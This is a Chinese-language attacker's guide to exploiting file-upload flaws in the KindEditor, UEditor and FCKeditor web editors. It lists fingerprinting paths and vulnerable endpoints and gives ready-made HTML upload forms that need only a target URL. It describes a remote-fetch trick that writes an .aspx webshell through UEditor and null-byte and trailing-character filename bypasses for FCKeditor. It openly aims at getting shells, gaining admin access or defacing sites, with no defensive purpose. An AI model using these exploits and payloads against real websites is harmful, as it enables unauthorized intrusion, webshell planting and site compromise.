常见编辑器的漏洞利用

常见编辑器的漏洞利用

kindeditor编辑器

kindeditor 4.1 文件上传漏洞（中危、不能拿shell）

1、漏洞问题：
Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件且上传文件地 址通常携带“/kineditor/“的关键字。
找到对应/kindeditor/目录访问kindeditor/kindediotr.js文件查看编辑器版本确定是否为存在漏洞版本
此次漏洞出现在kindeditor的upload_json文件，针对于各种脚本语言关键字为：

/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php

如访问存在该文件，查看对应关键参数是否可用，即：

kindeditor/asp/upload_json.asp?dir=file

kindeditor/asp.net/upload_json.ashx?dir=file

kindeditor/jsp/upload_json.jsp?dir=file

kindeditor/php/upload_json.php?dir=file

如参数可用，自行构造上传页面进行上传。页面代码如下：

<html><head>

 <title>Uploader</title>

 <script src="http://www.xxx.org/kindeditor//kindeditor.js"></script>

 <script>

 KindEditor.ready(function(K) {

 var uploadbutton = K.uploadbutton({

 button : K('#uploadButton')[0],

 fieldName : 'imgFile',

 url : 'http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file',

afterUpload : function(data) {

 if (data.error === 0) {

 var url = K.formatUrl(data.url, 'absolute');

 K('#url').val(url);}

 },

 });

 uploadbutton.fileBox.change(function(e) {

 uploadbutton.submit();

 });

});

 </script></head><body>

 <div class="upload">

 <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />

 <input type="button" id="uploadButton" value="Upload" />

 </div>

 </body>

</html>

注意：构造页面只需修改对应的目标关键字地址即可使用

因为该漏洞目前发现只能上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf文件，未成功绕过限制上传木马，但是可以上传自己构造的html页面，也就意味着可结合xss或者csrf等其他攻击方式去进行攻击，运气好是可以拿到后台权限的，最差也能传个黑页

Ueditor编辑器

Ueditor1.4.3编辑器上传漏洞（高危、针对aspx可拿shell）

1、漏洞问题：
UEditor是一款所见即所得的开源富文本编辑器，具有轻量、可定制、用户体验优秀等特点，被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本，其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞
漏洞文件为“controller.ashx“
漏洞利用条件：IIS、一台公网服务器
访问漏懂关键字地址："http://xxxxxxxxx/controller.ashx?action=catchimage"查询页面状态若存在“{“state”:“参数错误：没有指定抓取源”}“则证明存在该漏洞
自行构造上传页面，页面代码如下：

<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">  
<p>shell addr:<input type="text" name="source[]" /></p >  
<inputtype="submit" value="Submit" /></form>

只需修改action的url即可使用，由于该上传漏洞不能本地上传文件，只能利用远程文件上传，所以需要在公网服务器上布置好图片木马(例如1.jpg)，且需要上传地址将木马文件名修改成“1.jpg?.aspx”样式，填写远程服务器木马地址上传后即可得到名为1.aspx的webshell

FCKeditor编辑器（较复杂，利用方法较多）

Fckeditor编辑器文件上传地址

FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。它志于轻量化，不需要太复杂的安装步骤即可使用。它可和PHP、 JavaScript、ASP、ASP.NET、ColdFusion、Java、以及ABAP等不同的编程语言相结合
1.判断fck编辑器版本地址

/fckeditor/editor/dialog/fck_about.html
/FCKeditor/_whatsnew.html

2、上传地址

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html

针对ASP与ASP.NET上传拿shell

fck编辑器只会识别最后一个“.”的后缀，假设上传文件名为1.aspx%00.aspx%00jpg格式的文件，上传后文件名会变层1_aspx_.aspx_jpg这里我们要继续上传1.aspx%00.aspx%00jpg文件名的文件。因为之前已经相同名称文件上传了，这里服务器会对他重命名，重命名解析时造成00截断成功会生成1_asp_(1).aspx文件

针对php

fck2.2

可尝试使用上传1.php[空格]或者1.php.进行绕过

fck<=2.4.2

由于文件上传时未对MEDIA类型进行上传文件类型检测，导致用户可上传任意文件
自行构造页面，页面的代码为：

<form id=”frmUpload” enctype=”multipart/form-data”
action=”http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=”post”>Upload a new file:<br>
<input type=”file” name=”NewFile” size=”50″><br>
<input id=”btnUpload” type=”submit” value=”Upload”>
</form>

修改action对应的url进行上传即可

其他

因为文件上传通常还会结合着解析漏洞去尝试达到攻击效果，上述只是提供了大概思路，还需要具体情况具体分析